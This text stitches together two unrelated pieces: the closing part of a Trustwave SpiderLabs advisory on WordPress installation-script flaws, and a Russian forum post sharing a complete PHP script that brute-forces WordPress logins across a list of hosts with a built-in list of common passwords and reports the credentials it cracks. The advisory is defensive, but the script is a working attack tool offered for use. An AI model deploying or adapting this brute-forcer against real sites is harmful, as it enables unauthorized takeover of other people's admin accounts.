password information in your wp-config.php file is incorrect or we can't contact the database server at localhost. This could mean your host's database server is down. <---snip--> Vendor Response: Due to the fact that the component in question is an installation script, the vendor has stated that the attack surface is too small to warrant a fix: "We give priority to a better user experience at the install process. It is unlikely a user would go to the trouble of installing a copy of WordPress and then not finishing the setup process more-or-less immediately. The window of opportunity for exploiting such a vulnerability is very small." However, Trustwave SpiderLabs urges caution in situations where the WordPress installation script is provided as part of a default image. This is often done as a convenience on hosting providers, even in cases where the client does not use the software. It is a best practice to ensure that no installation scripts are exposed to outsiders, and these vulnerabilities reinforce the importance of this step. Remediation Steps: No official fix for these issues will be released for the WordPress publishing platform. However, administrators can mitigate these issues by creating strong MySQL passwords and defining rules within a web application firewall (WAF) solution. ModSecurity (http://www.modsecurity.org/) has added rules to the commercial rules feed for these issues, and Trustwave's vulnerability scanning solution, TrustKeeper, has been updated to detect exposed installation scripts. Vendor Communication Timeline: 12/22/11 - Vulnerability disclosed 01/16/12 - Confirmation to release vulnerabilities 01/24/12 - Advisory published References 1. http://www.wordpress.org About Trustwave: Trustwave is the leading provider of on-demand and subscription-based information security and payment card industry compliance management solutions to businesses and government entities throughout the world. For organizations faced with today's challenging data security and compliance environment, Trustwave provides a unique approach with comprehensive solutions that include its flagship TrustKeeper compliance management software and other proprietary security solutions. Trustwave has helped thousands of organizations--ranging from Fortune 500 businesses and large financial institutions to small and medium-sized retailers--manage compliance and secure their network infrastructure, data communications and critical information assets. Trustwave is headquartered in Chicago with offices throughout North America, South America, Europe, Africa, China and Australia. For more information, visit https://www.trustwave.com About Trustwave's SpiderLabs: SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs Disclaimer: The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
Скрипт онлайн Брута WordPress Нашёл в просторах интернета, решил поделиться брутом PHP: <?php echo " <!-- Wordpress Admin Panel Penetration Testing V 1 This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. --> "; error_reporting(0); set_time_limit(0); ignore_user_abort(true); ?> <html> <head> <meta http-equiv=Content-Type content=text/html; charset=utf-8 charset=UTF-8> <style type="text/css"> body { color: white; background-image: url(http://t1.gstatic.com/images?q=tbn:ANd9GcRQa5CloHyQPcJ7ghTVn0VlylyAvRnVArdDmu2f98SSS7U92rRX); } textarea { border-radius: 8px; color: white; background-color:black; } input[type=submit] , .submit{ background-color:black; color:white; border-radius:8px; } p { font-size: 10px; text-align: center; } a:link,a:hover,a:visited { color:pink; } </style> </head> <!-- # | WordPress Admin Panel Penetration Testing --> <center> <p><a href="#" target="_blank"><img src="http://2.bp.blogspot.com/_gnm2C1B8vbI/RtsXECxw5iI/AAAAAAAAAsM/PwfxmL8l7pM/s400/black_hat.jpg" border="0"/></a></p> <form enctype="multipart/form-data" method="POST"> <table width='624' border='0' id='Box'> <tr> <td width='4%'> </td> <td width="96%" colspan="3" align="center" ><p># | WordPress Admin Panel Penetration Testing </p></td> </tr> <tr> <td > </td> <td ><p>Hosts:</p></td> <td ><p> Users:</p></td> <td ><p>Passwords:</p></td> </tr> <tr> <td> </td> <td ><textarea name="hosts" cols="30" rows="10" ><?php if($_POST){echo $_POST['hosts'];} ?></textarea></td> <td ><textarea name="usernames" cols="30" rows="10" ><?php if($_POST){echo $_POST['usernames'];}else {echo "admin";} ?></textarea></td> <td ><textarea name="passwords" cols="30" rows="10" ><?php if($_POST){echo $_POST['passwords'];}else {echo "admin\nadministrator\n123123\n123321\n123456\n1234567\n12345678\n123456789\n123456123456\nadmin2010\nadmin2011\npassword\nP@ssW0rd\n!@#$%^\n!@#$%^&*(\n(*&^%$#@!\n111111\n222222\n333333\n444444\n555555\n666666\n777777\n888888\n999999";} ?></textarea></td> </tr> <tr><td colspan="4"><input type="submit" name="submit" value="Brute Now" class="submit" /> <?php if($_POST) { $hosts = trim(filter($_POST['hosts'])); $passwords = trim(filter($_POST['passwords'])); $usernames = trim(filter($_POST['usernames'])); if($passwords && $usernames && $hosts) { $hosts_explode = explode("\n", $hosts); $usernames_explode = explode("\n", $usernames); $passwords_explode = explode("\n", $passwords); foreach($hosts_explode as $host) { $host = RemoveLastSlash($host); $hacked = 0; $host = str_replace(array("http://","https://","www."),"",trim($host)); $host = "http://".$host; $wpAdmin = $host.'/wp-admin/'; if(!url_exists($host."/wp-login.php")) {echo "<p>".$host." => <font color='red'>Error In Login Page !</font></p>";ob_flush();flush();continue;} foreach($usernames_explode as $username) { foreach($passwords_explode as $password) { $ch = curl_init(); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_URL,$host.'/wp-login.php'); curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt"); curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt"); curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1); curl_setopt($ch,CURLOPT_POST,TRUE); curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username."&pwd=".$password."&wp-submit=Giri"."&redirect_to=".$wpAdmin."&testcookie=1"); $login = curl_exec($ch); if(eregi ("profile.php",$login) ) { $hacked = 1; echo "<p>".$host." => UserName : [<font color='green'>".$username."</font>] : Password : [<font color='green'>".$password."</font>]</p>"; ob_flush();flush();break; } } if($hacked == 1){break;} } if($hacked == 0) {echo "<p>".$host." => <font color='red'>Failed !</font></p>";ob_flush();flush();} } } else {echo "<p><font color='red'>All fields are Required ! </font></p>";} } ?> </td></tr> </table></form> <!-- # | WordPress Admin Panel Penetration Testing --> <p>powered by <a href="#">#</a></p> </center> <p> <?php function url_exists($strURL) { $resURL = curl_init(); curl_setopt($resURL, CURLOPT_URL, $strURL); curl_setopt($resURL, CURLOPT_BINARYTRANSFER, 1); curl_setopt($resURL, CURLOPT_HEADERFUNCTION, 'curlHeaderCallback'); curl_setopt($resURL, CURLOPT_FAILONERROR, 1); curl_exec ($resURL); $intReturnCode = curl_getinfo($resURL, CURLINFO_HTTP_CODE); curl_close ($resURL); if ($intReturnCode != 200){return false;} else{return true ;} } function filter($string) { if(get_magic_quotes_gpc() != 0){return stripslashes($string); } else{return $string; } } function RemoveLastSlash($host) { if(strrpos($host, '/', -1) == strlen($host)-1) {return substr($host,0,strrpos($host, '/', -1));} else{return $host;} } ?> <?php echo "</p>"; ?> Пользуйтесь на здоровье, и главное, подобрали пароль, сообщили админу!
